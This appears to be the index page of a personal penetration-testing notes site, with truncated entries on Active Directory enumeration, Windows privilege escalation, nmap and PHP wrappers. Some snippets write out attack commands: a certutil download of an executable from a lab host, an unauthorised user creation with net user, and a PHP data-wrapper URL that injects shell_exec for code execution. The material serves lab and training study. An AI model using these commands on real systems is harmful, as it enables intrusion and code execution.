Shuciran Pentesting Notes

Bloodhound

Sharphound.exe First upload SharpHound to the system, then run the following commands from a folder where you have write access, as it will download a .zip file: # For SharpHound.ps1 (each line is a comm...

NTP Synchronization

#Note It is possible that sometimes you need to use the host domain (e.g. sizzle.htb) NTPDATE ntpdate 10.10.11.102 RDATE rdate -n 10.10.11.102 DATE It is also possible to set the date “manually” ...

Windows User Creation/Group Addition

User create If we are able to create a user, it is as simple as using the net.exe Windows utility: net user shuciran shucir4n /add Add user to a group If there is a group in the domain with some pr...

Unquoted Service Path

Another interesting attack vector that can lead to privilege escalation on Windows operating systems revolves around unquoted service paths. We can use this attack when we have write permissions to...

UAC Integrity Level Upgrade

Even while logged in as an administrative user, the account will have two security tokens, one running at a medium integrity level and the other at high integrity level. UAC acts as the separation ...

Certutil.exe

certutil.exe -urlcache -f http://10.0.0.5/40564.exe C:\Windows\Temp\bad.exe Example: [[Forest#^8fde0e]] # Dump general information certutil -dump # Dump information about certificate authority ce...

System (Windows)

System information systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" systeminfo | findstr /C:"sistema" #Español Installed updates wmic qfe get Caption, Description Installed ...

NMAP

Scan Network Range Shuciran@htb[/htb]$ sudo nmap 10.129.2.0/24 -sn -oA tnet | grep for | cut -d" " -f5 10.129.2.4 10.129.2.10 10.129.2.11 10.129.2.18 10.129.2.19 10.129.2.20 10.129.2.28 Nmap Styl...

Common Ports

Port Type Usage 20 TCP FTP Data 21 TCP FTP Control 22 TCP/UDP Secure Shell (SSH)...

PHP Wrappers

Wrappers data Represent a string on the web page http://10.11.0.22/menu.php?file=data:text/plain,hello world Shell with data http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_ex...